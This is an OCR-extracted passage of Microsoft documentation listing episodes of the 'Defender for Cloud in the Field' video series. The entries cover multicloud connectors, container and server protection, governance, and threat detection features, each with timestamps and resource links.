joins Yuri to talk about lessons from the field and how customers are using Microsoft 
Defender for Cloud to improve their security posture and protect their workloads in a 


multicloud environment. 


Carlos also covers how Microsoft Defender for Cloud is used to fill the gap between 
cloud security posture management and cloud workload protection, and demonstrates 
some features related to this scenario. 


° - Why Microsoft Defender for Cloud is a unique solution when compared with 


other competitors? 


° - How to fulfill the gap between CSPM and CWPP 


e 4:42 - How a multicloud affects the CSPM lifecycle and how Defender for Cloud fits 


in? 
e 8:05 - Demonstration 


e 12:34 - Final considerations 


Recommended resources 

Learn more What is Microsoft Defender for Cloud?. 
e Subscribe to Microsoft Security on YouTube 7 
e Follow us on social media: LinkedIn’ Twitter” 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


New GCP Connector in Microsoft Defender for Cloud 


New GCP connector in Microsoft 
Defender for Cloud 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, Or Serok joins 
Yuri Diogenes to share the new GCP Connector in Microsoft Defender for Cloud. Or 
explains the use case scenarios for the new connector and how the new connector 
works. She demonstrates the onboarding process to connect GCP with Microsoft 
Defender for Cloud and talks about custom assessment and the CSPM experience for 


multicloud 


e 1:23 - Overview of the new GCP connector 
e 4:05 - Migration path from the old GCP connector to the new one 


e 5:10 - Type of assessment utilized by the new GCP connector 


e 5:51 - Custom assessments (deprecated) 
e 6:52 - Demonstration 
e 15:05 - Recommendation experience 


e 18:00 - Final considerations 


Recommended resources 

Learn more how to Connect your GCP projects to Microsoft Defender for Cloud. 
e Subscribe to Microsoft Security on YouTube 7 
e Follow us on social media: LinkedIn’ Twitter & 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Microsoft Defender for loT 


Microsoft Defender for loT 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Dolev Zemer 
joins Yuri Diogenes to talk about how Defender for loT works. Dolev explains the 
difference between OT Security and IT Security and how Defender for IoT fulfills this gap. 
Dolev also demonstrates how Defender for loT discovers devices to monitor and how it 
fits in the Microsoft Security portfolio. 


e 1:20 - Overview of the Defender for loT solution 
e 2:15 - Difference between OT and loT 

e 3:30 - Prerequisites to use Defender for loT 

e 4:30 - Security posture and threat detection 


e 5:17 - Automating alert response 


e 6:15 - Integration with Microsoft Sentinel 
e 6:50 - Architecture 


e 8:40 - Demonstration 


Recommended resources 
Learn more about Defender for loT. 
e Subscribe to Microsoft Security on YouTube 7 
e Follow us on social media: Linkedln Z Twitter“ 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Microsoft Defender for Containers in a Multicloud Environment 


Microsoft Defender for Containers ina 
Multicloud Environment 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, Maya Herskovic 
joins Yuri Diogenes to talk about Microsoft Defender for Containers implementation in 


AWS and GCP. 


Maya explains about the new workload protection capabilities related to Containers 
when they're deployed in a multicloud environment. Maya also demonstrates the 
onboarding experience in GCP and how to visualize security recommendations across 
AWS, GCP, and Azure in a single dashboard. 


e 01:12 - Container protection in a multicloud environment 


e 05:03 - Workload protection capabilities for GCP 


e 06:18 - Single dashboard for multi-cloud 


e 10:25 - Demonstration 


Recommended resources 

Learn how to Enable Microsoft Defender for Containers. 
e Subscribe to Microsoft Security on YouTube & 
e Follow us on social media: LinkedIn Z Twitter 
e Join our Tech Community E 


e For more about Microsoft Security 7 


Next steps 


Protecting Containers in GCP with Defender for Containers 


Protecting containers in GCP with 
Defender for Containers 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the field, Nadav Wolfin 
joins Yuri Diogenes to talk about how to use Defender for Containers to protect 
Containers that are located at Google Cloud (GCP). 


Nadav gives insights about workload protection for GKE and how to obtain visibility of 
this type of workload across Azure and AWS. Nadav also demonstrates the overall 
onboarding experience and provides an overview of the architecture of this solution. 


° - Architecture solution for Defender for Containers and support for GKE 


° - How the onboard process works 


° - Demonstration 


e 26:18 - Integration with Azure Arc 


Recommended resources 

Learn how to Enable Microsoft Defender for Containers. 
e Subscribe to Microsoft Security on YouTube & 
e Follow us on social media: LinkedIn“ Twitter“ 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Threat landscape for Containers 


Threat landscape for Defender for 
Containers 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Yossi Weizman 
joins Yuri Diogenes to talk about the evolution of the threat matrix for Containers and 
how attacks against Kubernetes have evolved. Yossi also demonstrates new detections 
that are available for different attacks and how Defender for Containers can help to 


quickly identify malicious activities in containers. 


° - The evolution of attacks against Kubernetes 
° - Identity related attacks against Kubernetes 
° - Threat detection beyond audit logs 


° - Demonstration 


Recommended resources 

Learn how to detect identity attacks in Kubernetes E, 
e Subscribe to Microsoft Security on YouTube Z 
e Follow us on social media: Linkedln £ Twitter“ 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Enhanced workload protection features in Defender for Servers 


Enhanced workload protection features 
in Defender for Servers 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Netta Norman 
joins Yuri Diogenes to talk about the enhanced capabilities available in Defender for 
Servers, for VMs that are located in GCP, AWS and on-premises. 


Netta explains how Defender for Servers applies Azure Arc as a bridge to onboard non- 
Azure VMs as she demonstrates what the experience looks like. 


Enhanced workload 
protection features in 
Defender for Servers 


ae Microsoft Security 


e 00:55 - Arc Auto-provisioning in GCP 


e 2:57 - Prerequisites to Arc auto-provisioning 
e 3:50 - Considerations when enabling Defender for Server plan in GCP 


e 5:20 - Dashboard refresh time interval 


e 7:00 - Security value for non-Azure workloads 


e 9:06 - Demonstration 


Recommended resources 
Introduce yourself to Microsoft Defender for Servers. 
e Subscribe to Microsoft Security on YouTube & 

e Follow us on social media: LinkedIn Z Twitter £ 
e Join our Tech Community E 


e For more about Microsoft Security 7 


Next steps 


Defender for Storage 


Defender for Storage 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Eitan Shteinberg 
joins Yuri Diogenes to talk about the threat landscape for Azure Storage and how 
Defender for Storage can help detect and mitigate these threats. 


Eitan talks about different use case scenarios, best practices to deploy Defender for 
Storage and he also demonstrates how to investigate an alert generated by Defender 


for Storage. 


Microsoft Defender | 
for Storage 


B® Microsoft Security 


e 01:00 - Current threats for Cloud Storage workloads 


e 07:00 - Defender for Storage threat detections 
e 10:10 - How Defender for Storage works after you enable it 


e 20:35 - How to investigate a Defender for Storage Alert 


e 29:00 - Best practices to enable Defender for Storage 


e 32:15 - What's coming next 


Recommended resources 
Introduction to Microsoft Defender for Storage. 
e Subscribe to Microsoft Security on YouTube & 
e Follow us on social media: LinkedIn Z Twitter £ 
e Join our Tech Community E 


e For more about Microsoft Security 7 


Next steps 


Defender for Servers deployment in AWS and GCP 


Defender for Servers deployment in 
AWS and GCP 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Ortal Parpara 
joins Yuri Diogenes to talk about the options to deploy Defender for Servers in AWS and 
GCP. Ortal talks about the new capability that allows you to select a different Defender 
for Server plan per connector, demonstrates how to customize the deployment and how 


this feature helps to deploy Azure Arc. 


Defender for Servers l 
deployment for 
AWS and GCP 


B® Microsoft Security 


00:00 - Introduction 


01:30 - Selecting the appropriate plan for AWS and GCP 
e 03:05 - Is it necessary to make any action to apply this change? 


e 03:23 - Supported scenarios 


e 03:40 - What changes should you expect to see on your environment? 


e 05:49 - Demonstration 


Recommended resources 

Enhanced workload protection features in Defender for Servers. 
e Subscribe to Microsoft Security on YouTube Z 
e Follow us on social media: LinkedIn Z Twitter” 
e Join our Tech Community E 


e For more about Microsoft Security 7 


Next steps 


Remediate Security Recommendations with Governance 


Remediate security recommendations 
with governance 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Amit Biton joins 
Yuri Diogenes to talk about the new governance feature in Defender for Cloud. Amit 
explains the rationale behind this feature. Amit explains why it's important to have 
governance in place in order to drive security posture improvement and how this 
feature can help with that. Amit demonstrates how to create governance rules, how to 


monitor and take action to improve the secure score. 


Remediate Security 
Recommendations 
with Governance 


B® Microsoft Security 


e 01:14 - What is the Governance feature? 


e 05:54 - What are the permissions required to configure Governance rules? 


e 06:51 - How workload owners receive notifications 


e 10:13 - Understanding grace period 
e 15:20 - Enabling Governance at scale 


e 16:25 - Demonstration 


Recommended resources 


Driving your organization to remediate security issues with recommendation 
governance in Microsoft Defender for Cloud. 


e Subscribe to Microsoft Security on YouTube 7 
e Follow us on social media: LinkedIn’ Twitter” 
e Join our Tech Community E 


e For more about Microsoft Security Z 


Next steps 


Defender for Servers integration with Microsoft Defender for Endpoint 


Defender for Servers integration with 
Microsoft Defender for Endpoint 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Erel Hansav joins 
Yuri Diogenes to talk about the latest updates regarding the Defender for Servers 
integration with Microsoft Defender for Endpoint. Erel explains the architecture of this 
integration for the different versions of Windows Servers, how this integration takes 
place in the backend, the deployment options for Windows and Linux and the 


deployment at scale using Azure Policy. 


Defender for Servers 
integration with MDE 


B® Microsoft Security 


e 00:0 - Introduction 


e 02:13 - Understanding Microsoft Defender for Endpoint's integration with 
Defender for Servers 


e 015:30 - Onboarding flow 


e 20:05 - Options to deploy at scale 


Recommended resources 


Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft 


Defender for Endpoint 
e Subscribe to Microsoft Security on YouTube & 
e Follow us on social media: Linkedln Z Twitter“ 
e Join our Tech Community Z 


e For more about Microsoft Security Z 


Next steps 


Defender for Cloud integration with Microsoft Entra | Defender for Cloud in the 


Field 


Defender for Cloud integration with 
Microsoft Entra | Defender for Cloud in 
the Field 


Article e 10/11/2023 


Episode description: In this episode of Defender for Cloud in the Field, Bar Brownshtein 
joins Yuri Diogenes to talk about the new Defender for Cloud integration with Microsoft 
Entra. Bar explains the rationale behind this integration, the importance of having 
everything in a single dashboard and how this integration works. Bar also covers the 
recommendations that are generated by this integration and demonstrate the 
experience in the dashboard. 
https://aka.ms/docs/player?id=96a0ecdb-b1c3-423f-9ff1-47fccSd6ab1b £ 


e 00:00 - Defender for Cloud integration with Microsoft Entra 
e 00:55 - What is Cloud Infrastructure Entitlement Management? 
e 02:20 - How does the integration with MDC work? 


e 03:58 - Demonstration 


Recommended resources 

Learn more about Microsoft Entra Permission Management 
e Subscribe to Microsoft Security on YouTube % 
e Follow us on social media: Linkedln £ Twitter“ 
e Join our Tech Community E 


e For more about Microsoft Security E 


Next steps 


New AWS Connector in Microsoft Defender for Cloud 


Defender for Azure Cosmos DB | 
Defender for Cloud in the Field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Haim Bendanan 
joins Yuri Diogenes to talk about Defender for Azure Cosmos DB. Haim explains the 
rationale behind the use of this plan to protect Azure Cosmos DB databases, the 
different threat detections that are available with this plan, and the security 
recommendations that were added. Haim also demonstrates how Defender for Azure 
Cosmos DB detects a SQL injection attack. 


e 00:00 - Intro 
e 01:37 - Azure Cosmos DB main use case scenarios 
e 02:30 - Recommendations and alerts in Defender for Azure Cosmos DB 


e 04:30 - SQL Injection detection for Azure Cosmos DB 


e 06:15 - Key extraction detection for Azure Cosmos DB 
e 11:00 - Demonstration 


e 14:30 - Final considerations 


Recommended resources 
Learn more about Enable Microsoft Defender for Azure Cosmos DB 
e Subscribe to Microsoft Security on YouTube 7 


e Follow us on social media: 
o LinkedIn Z 


o Twitter 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


Defender for DevOps | Defender for Cloud in the field 


Defender for DevOps | Defender for 
Cloud in the Field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Sukhandeep 
Singh joins Yuri Diogenes to talk about Defender for DevOps. Sukhandeep explains how 
Defender for DevOps uses a central console to provide security teams DevOps insights 
across multi-pipeline environments, such as GitHub and Azure DevOps. Sukhandeep 
also covers the security recommendations created by Defender for DevOps and 
demonstrates how to configure a GitHub connector using Defender for Cloud 
dashboard. 


e 01:16 - What is Defender for DevOps? 
e 02:22 - Current Integrations 


e 02:47- GitHub connector 


04:16 - Security recommendations 


05:54 - Protection for infrastructure as a code 


07:03 - Azure ADO connector 


08:22 - Demonstration 


Recommended resources 
e Learn more about Defender for DevOps. 
e Subscribe to Microsoft Security on YouTube & 
e Join our Tech Community E 
e For more about Microsoft Security % 


e Follow us on social media: 
o LinkedIn Z 


o Twitter £ 
e Join our Tech Community Z 


e Learn more about Microsoft Security E 


Next steps 


Cloud security explorer and attack path analysis 


Cloud security explorer and attack path 
analysis | Defender for Cloud in the 
Field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Tal Rosler joins 
Yuri Diogenes to talk about cloud security explorer and attack path analysis, two new 
capabilities in Defender CSPM that were released at Ignite. The talk explains the 
rationale behind creating these features and how to use these features to prioritize what 
is more important to keep your environment more secure. Tal also demonstrates how to 
use these capabilities to quickly identify vulnerabilities and misconfigurations in cloud 


workloads. 


Cloud security 
explorer and Attack 
path analysis 


B® Microsoft Security 


e 01:27 - The business case for cloud security graph 


e 03:00 - What is cloud security graph 


e 05:06 - Demonstration 
e 09:30 - How paths are created under attack path 
e 12:00 - Cloud security explorer demonstration 


e 19:25 - Saving cloud security explorer queries 


Recommended resources 
e Learn more about Attack path. 
e Subscribe to Microsoft Security on YouTube 7 
e Join our Tech Community E 
e For more about Microsoft Security % 


e Follow us on social media: 
o LinkedIn Z 


o Twitter £ 
e Join our Tech Community Z 


e Learn more about Microsoft Security E 


Next steps 


Latest updates in the regulatory compliance dashboard 


Latest updates in the regulatory 
compliance dashboard| Defender for 
Cloud in the Field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Ronit Reger joins 
Yuri Diogenes to talk about the latest updates in the regulatory compliance dashboard 
that were released at Ignite. Ronit talks about the new attestation capability and the new 
Microsoft cloud security benchmark. Ronit also demonstrates how to create manual 


attestations in the regulatory compliance dashboard. 


° - Intro 
° - What's new in the regulatory compliance dashboard 
° - The new Microsoft cloud security benchmark 


° - Demonstration 


e 13:49 - Manual attestation 


Recommended resources 


e Learn more about improving your regulatory compliance. 
e Subscribe to Microsoft Security on YouTube & 

e Join our Tech Community Z 

e For more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


Defender External Attack Surface Management (Defender EASM) 


Defender EASM | Defender for Cloud in 
the Field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Jamil Mirza joins 
Yuri Diogenes to talk about Microsoft Defender External Attack Surface Management 
(Defender EASM). Jamil explains how Defender EASM continuously discovers and maps 
your digital attack surface to provide an external view of your online infrastructure. Jamil 
also covers the integration with Defender for Cloud, how it works, and he demonstrates 
different capabilities available in Defender EASM. 


e 01:11 - What is Defender EASM? 
e 02:59 - How does Defender EASM work? 
e 05:55 - What type of information is discovered? 


e 09:50 - Integration with Defender for Cloud 


e 11:51 - Demonstration 


Recommended resources 


e Learn more about external attack surface management. 
e Subscribe to Microsoft Security on YouTube & 

e Join our Tech Community EK 

e For more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


Defender Threat Intelligence (Defender TI) 


Defender threat Intelligence | Defender 
for Cloud in the Field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Alexandra 
Roland joins Yuri Diogenes to talk about Microsoft Defender Threat Intelligence 
(Defender Tl). Alexandra explains how Defender TI works and how it integrates with 
Defender EASM. Alexandra goes over an end-to-end scenario to demonstrate how to 
use Defender TI to perform a security investigation based on the data collected by the 


platform. 


° - How Defender for Cloud leverages Defender TI 
° - What is reputation score in Defender TI 
° - How to try Defender TI 


° - Demonstration 


Recommended resources 
e Learn more about Defender TI. 
e Subscribe to Microsoft Security on YouTube Z 
e Join our Tech Community E 
e For more about Microsoft Security Z 


e Follow us on social media: 
o LinkedIn Z 


o Twitter Z 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


Enhancements in Defender for SQL Vulnerability Assessment 


Enhancements in Defender for SQL 
vulnerability assessment | Defender for 
Cloud in the field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Catalin Esanu 
joins Yuri Diogenes to talk about the enhancements in Defender for SQL Vulnerability 
Assessment (VA) capability that were announced. Catalin explains how the new SQL VA 
Express changed to allow a frictionless onboarding experience and how it became easier 
to manage VA baselines. Catalin demonstrates how to enable this experience and how 


to customize the baseline with companion scripts. 


° - Architecture change in SQL VA 
° - Enabling SQL VA Express 
° - Performance considerations 


° - Other additions to SQL VA Express 


e 12:56 - Demonstration 


Recommended resources 
e Learn more’ about Defender for SQL Vulnerability Assessment (VA). 
e Subscribe to Microsoft Security on YouTube & 
e Join our Tech Community E 
e For more about Microsoft Security Z 


e Follow us on social media: 
o Linkedin Z 


o Twitter 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


AWS ECR Coverage in Defender for Containers 


AWS ECR Coverage in Defender for 
Containers | Defender for Cloud in the 
field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Tomer Spivak 
joins Yuri Diogenes to talk about the new AWS ECR coverage in Defender for Containers. 
Tomer explains how Defender for Containers performs vulnerability assessment for ECR 
workloads in AWS and how to enable this capability. Tomer demonstrates the user 
experience in Defender for Cloud, showing the vulnerability findings in the dashboard 
and the onboarding process. 


e 00:00 - Intro 

e 01:44 - Introducing AWS ECR coverage 

e 03:38 - How new repos or images are discovered after the initial assessment 
e 04:22 - Scanning frequency 


e 07:33 - Demonstration 


Recommended resources 


e Learn more about AWS ECR Coverage in Defender for Containers. 
e Subscribe to Microsoft Security on YouTube & 

e Join our Tech Community Z 

e For more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


Governance capability improvements in Defender for Cloud 


Governance capability improvements in 
Defender for Cloud | Defender for Cloud 
in the field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Lior Arviv joins 
Yuri Diogenes to talk about the Governance capability improvements in Defender for 
Cloud. Lior gives a quick recap of the business need for governance and covers the new 
at scale governance capability. Lior demonstrates how to deploy governance at scale 


and how to monitor rules assignments and define priorities. 


Governance capabilities 
improvements in 
Defender for Cloud 


A 


EE Microsoft Security Te 


e 01:13 - Reviewing the need for cloud security governance 


e 04:10 - Governance at scale 

e 07:03 - Deployment options 

e 07:45 - Demonstration 

e 19:00 - Learn more about governance 


Recommended resources 


e Learn how to drive your organization to remediate security recommendations with 


governance 
e Subscribe to Microsoft Security on YouTube & 
e Join our Tech Community E 

e For more about Microsoft Security Z 


e Follow us on social media: 
o Linkedin Z 


o Twitter 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


Demystifying Defender for Servers 


Demystifying Defender for Servers | 
Defender for Cloud in the field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Tom Janetscheck 
joins Yuri Diogenes to talk about the different deployment options in Defender for 
Servers. Tom covers the different agents available and the scenarios that will be most 
used for each agent, including the agentless feature. Tom also talks about the different 
vulnerability assessment solutions available, and how to deploy Defender for Servers at 


scale via policy or custom automation. 


e 02:14 - Understanding Defender for Servers P1 and P2 

e 06:15 - Pricing model 

e 07:37 - Integration with MDE 

e 10:08 - Using Defender for Servers P2 without MDE 

e 11:32 - Understanding the different types of agents used by Defender for Servers 
e 17:11 - The case for agentless implementation 


e 22:52 - Deploying Defender for Servers at scale 


Recommended resources 
e Learn more about Defender for Servers 
e Subscribe to Microsoft Security on YouTube & 
e Join our Tech Community E 
e For more about Microsoft Security Z 


e Follow us on social media: 
o Linkedin Z 


o Twitter 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


Zero Trust and Defender for Cloud 


Zero Trust and Defender for Cloud | 
Defender for Cloud in the field 


Article e 04/27/2023 


Episode description: In this episode of Defender for Cloud in the Field, Mekonnen Kassa 
joins Yuri Diogenes to discuss the importance of using Zero Trust. Mekonnen covers the 
principles of Zero Trust, the importance of switching your mindset to adopt this strategy 
and how Defender for Cloud can help. Mekonnen also talks about best practices to get 
started, visibility and analytics as part of Zero Trust, and what tools can be leveraged to 
achieve it. 

https://aka.ms/docs/player?id=125af768-01bd-45ac-8503-4dba5eb53ff7 zZ 


e 01:21 - What is Zero Trust? 

e 04:12 - Current challenges with multicloud and hybrid workloads 

e 06:47 - How can Defender for Cloud help with Zero Trust? 

e 11:38 - Azure Network Security Controls that can help with Zero Trust 
e 14:50 - Visibility and Analytics for Zero Trust 

e 18:09 - Final recommendations to start your Zero Trust journey 


Recommended resources 
e Learn more about Zero Trust“ 
e Subscribe to Microsoft Security on YouTube 7 
e Join our Tech Community E 
e For more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter £ 
e Join our Tech Community Z 


e Learn more about Microsoft Security E 


Next steps 


Security Policy Enhancements in Defender for Cloud 


Security policy enhancements in 
Defender for Cloud 


Article e 05/14/2023 


Episode description: In this episode of Defender for Cloud in the field, Tuval Rozner 
joins Yuri Diogenes to talk about the new security policy enhancements. Tuval covers 
the new security policy dashboard within Defender for Cloud, how to filter, and create 
exemptions from a single place without having to make changes in the Azure Policy 
dashboard. Tuval also demonstrates how to use the new dashboard and customize 
policies. 

https://aka.ms/docs/player?id=1145810e-fc14-4d73-8d63-ea861aefb30b 7 


e 01:21 - The rationale behind changing the security policy assignment experience 
e 02:20 - What's new in the security policy assignment in Defender for Cloud? 

e 04:20 - Demonstration 

e 12:02 - What's next? 


Recommended resources 


e Learn more about managing security policies 
e Subscribe to Microsoft Security on YouTube & 
e Join our Tech Community Z 

e For more about Microsoft Security E 


e Follow us on social media: 
o Linkedin Z 


o Twitter’ 
e Join our Tech Community E 


e Learn more about Microsoft Security E 


Next steps 


New Custom Recommendations for AWS and GCP in Defender for Cloud 


New custom recommendations for AWS 
and GCP in Defender for Cloud 


Article e 09/13/2023 


Episode description: In this episode of Defender for Cloud in the Field, Yael Genut joins 
Yuri Diogenes to talk about the new custom recommendations for AWS and GCP. Yael 
explains the importance of creating custom recommendations in a multicloud 
environment and how to use Kusto Query Language to create these customizations. Yael 
also demonstrates the step-by-step process to create custom recommendations using 
this new capability and how these custom recommendations appear in the Defender for 
Cloud dashboard. 
https://aka.ms/docs/player?id=41612fbe-4c9c-4cd2-9a99-3fbd94d31bec 7 


e 01:44 - Understanding custom recommendations 

e 03:15 - Creating a custom recommendation based on a template 

e 08:20 - Creating a custom recommendation from scratch 

e 12:27 - Custom recommendation update interval 

e 14:30 - Filtering custom recommendations in the Defender for Cloud dashboard 
e 16:40 - Prerequisites to use the custom recommendations feature 


Recommended resources 
e Learn how to create custom recommendations and security standards 
e Subscribe to Microsoft Security on YouTube % 
e Join our Tech Community E 
e Learn more about Microsoft Security E 


e Follow us on social media: 
o Linkedin Z 


o Twitter’ 


e Join our Tech Community E 


Next steps 


Understanding data aware security posture capabilities 


Understanding data aware security 
posture capability 


Article e 06/08/2023 


Episode description: In this episode of Defender for Cloud in the Field, Tzach Kaufmann 
joins Yuri Diogenes to talk about data aware security posture capability as part of 
Defender CSPM. Tzach explains the importance of having data aware security posture 
capability to help security admins with risk prioritization. Tzach also demonstrates the 
step-by-step process to onboard this capability and demonstrates how to obtain the 
insights using Attack Path. 

https://aka.ms/docs/player?id=dd1 1ab/8-d945-4727-a4e4-cf19eb1922f2 7 


e 00:00 - Intro 

e 02:00 - What is Data Aware Security Posture? 

e 03:38 - Understanding the onboarding process 

e 05:00 - Sensitive labels discovery process 

e 07:05 - What's the difference between Data Aware Security Posture and Microsoft 
Purview? 


e 11:35 - Demonstration 


Recommended resources 


e Learn more about Data Aware Security Posture 
e Subscribe to Microsoft Security on YouTube 7 
e Learn more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter’ 


e Join our Tech Community Z 


Next steps 


API Security with Defender for APIs 


API Security with Defender for APIs 


Article e 06/18/2023 


Episode description: In this episode of Defender for Cloud in the Field, Preetham Naik 
joins Yuri Diogenes to talk about API security with Defender for APIs. Preetham explains 
the importance of API security and why the threats in this area are growing. Preetham 
introduces the new Defender for APIs plan released in public preview and gives an 
overview of all its capabilities. Preetham also demonstrates the step-by-step process to 
onboard this plan and demonstrates how to address API security recommendations. 
https://aka.ms/docs/player?id=657f8b1b-8072-4075-a244-07c93ecf6556 z 


e 02:15 - Why is API Security important? 

e 05:15 - The state of the API Security Market 

e 07:06 - What are the risks associated with API? 

e 11:25 - What you should expect from Defender for APIs 
e 15:53 - Demonstration 


Recommended resources 
e Learn more about Defender for APIs 
e Subscribe to Microsoft Security on YouTube & 
e Learn more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter?’ 


e Join our Tech Community E 


Next steps 


Agentless Container Posture Management in Defender for Cloud 


Agentless container posture 
management 


Article e 06/18/2023 


Episode description: In this episode of Defender for Cloud in the Field, Shani Freund 
Menscher joins Yuri Diogenes to talk about a new capability in Defender CSPM called 
Agentless Container Posture Management. Shani explains how Agentless Container 
Posture Management works, how to onboard, and how to leverage this feature to obtain 
more insights into the container's security. Shani also demonstrates how to visualize this 
information using Attack Path and Cloud Security Explorer. 
https://aka.ms/docs/player?id=abceb157-b850-42f0-8b83-92cbef16c893 z 


e 01:48 - Overview of Defender CSPM 

e 03:06 - What container capabilities are included in Defender CSPM 
e 05:00 - How to find Container's insights using Attack Path 

e 06:14 - How agentless container posture management works 

e 07:28 - Supported environment for this capability 

e 07:48 - Demonstration 


Recommended resources 
e Learn more about agentless container posture 
e Subscribe to Microsoft Security on YouTube % 
e Learn more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter’ 


e Join our Tech Community Z 


Next steps 


New AWS Connector in Microsoft Defender for Cloud 


Understanding the DevOps Threat 
Matrix 


Article e 06/21/2023 


Episode description: In this episode of Defender for Cloud in the Field, Ariel Brukman 
joins Yuri Diogenes to talk about the DevOps Threat Matrix. Ariel talks about the process 
of creating a new threat matrix for a very complex domain such as DevOps, what it was 
found during the research process and how the research evolved to create this threat 
matrix. Ariel also talks about how to use the threat matrix to improve your DevOps 
defenses, and he gives examples of some common attacks against DevOps 
environments. 
https://aka.ms/docs/player?id=20631aa4-501c-4fa6-bd9c-eadab45887af 7 


e 02:49 - The research leading to DevOps Matrix publication 
e 05:35 - Threats in the execution phase 

e 08:50 - Privilege escalation phase 

e 13:00 - Common patterns of attack 

e 13:42 - Recommendations to build better defenses 


Recommended resources 
e Learn more about the DevOps Threat Matrix” 
e Subscribe to Microsoft Security on YouTube Z 
e Learn more about Microsoft Security 7 


e Follow us on social media: 
o LinkedIn Z 


o Twitter’ 


e Join our Tech Community Z 


Next steps 


New AWS Connector in Microsoft Defender for Cloud 


Security alert correlation 


Article e 08/29/2023 


Episode description: In this episode of Defender for Cloud in the Field, Daniel Davrayev 
joins Yuri Diogenes to talk about security alert correlation capability in Defender for 
Cloud. Daniel talks about the importance of have a built-in capability to correlate alerts 
in Defender for Cloud, how this capability saves time for SOC analysts to investigate 
alert and respond to potential threats. Daniel also explains how data correlation works 
and demonstrate how this correlation appears in Defender for Cloud dashboard as a 
security incident. 
https://aka.ms/docs/player?id=6573561d-70a6-4b4c-ad16-9efe747c9a61 & 


e 00:00 - Intro 

e 02:15 - How Defender for Cloud handles alert prioritization 

e 04:29 - How Defender for Cloud can help with alert correlation 

e 07:05 - How Defender for Cloud creates alerts correlation 

e 09:06 - Does alert correlation works across different Defender for Cloud plans? 
e 11:42 - Demonstration 


Recommended resources 


e Learn more’ 
e Subscribe to Microsoft Security on YouTube & 
e Learn more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter’ 


e Join our Tech Community E 


Next steps 


Defender CSPM support for GCP and more updates 


Defender CSPM support for GCP and 
more updates 


Article e 08/29/2023 


Episode description: In this episode of Defender for Cloud in the Field, Amit Biton joins 
Yuri Diogenes to talk about the new Defender CSPM support for GCP. Amit talks about 
the recent investments in multicloud and the alignment with Microsoft CNAPP strategy. 
Amit covers the capabilities that were released in Defender CSPM to cover GCP, 
including the new Microsoft Cloud Security Benchmark for GCP. Amit also demonstrate 
the use of Attack Path and Cloud Security explorer in a multicloud environment. 
https://aka.ms/docs/player?id=673a8d91 -3b0e-4bfb-986c-888ae7532320 7 


e 01:23 - Overview of the new announcements for multicloud 
e 05:09 - Microsoft CNAPP strategy 

e 08:55 - Agentless capability 

e 12:54 - Demonstration 


Recommended resources 
e Learn more 
e Subscribe to Microsoft Security on YouTube & 
e Learn more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter’ 


e Join our Tech Community E 


Next steps 


Capabilities to counter identity-based supply chain attacks 


Capabilities to counter identity-based 
supply chain attacks 


Article e 08/29/2023 


Episode description: In this episode of Defender for Cloud in the Field, Security 
Researcher, Hagai Kestenberg joins Yuri Diogenes to talk about Defender for Cloud 
capabilities to counter identity-based supply chain attacks. Hagai explains the different 
types of supply chain attacks and focuses on the risks of identity-based supply chain 
attacks. Hagai makes recommendations to mitigate this type of attack and explain the 
new capability in Defender for Resource Manager that can be used to identify this type 
of attack. Hagai also demonstrates the new alert generated by Defender for Resource 
Manager when this type of attack is identified. 
https://aka.ms/docs/player?id=d69fb652-46a7-4f8c-8632-8cf2cbc3685a% 


e 01:41 - Intro 

e 04:04 - Understanding identity-based supply chain attacks 

e 06:50 - Identity-based supply chain attacks sample scenario 

e 08:26 - Best practices to prevent identity-based supply chain attacks 
e 10:29 - Demonstration 


Recommended resources 


e Learn more’ 
e Subscribe to Microsoft Security on YouTube % 
e Learn more about Microsoft Security E 


e Follow us on social media: 
o LinkedIn Z 


o Twitter’ 


e Join our Tech Community Z 


Next steps 


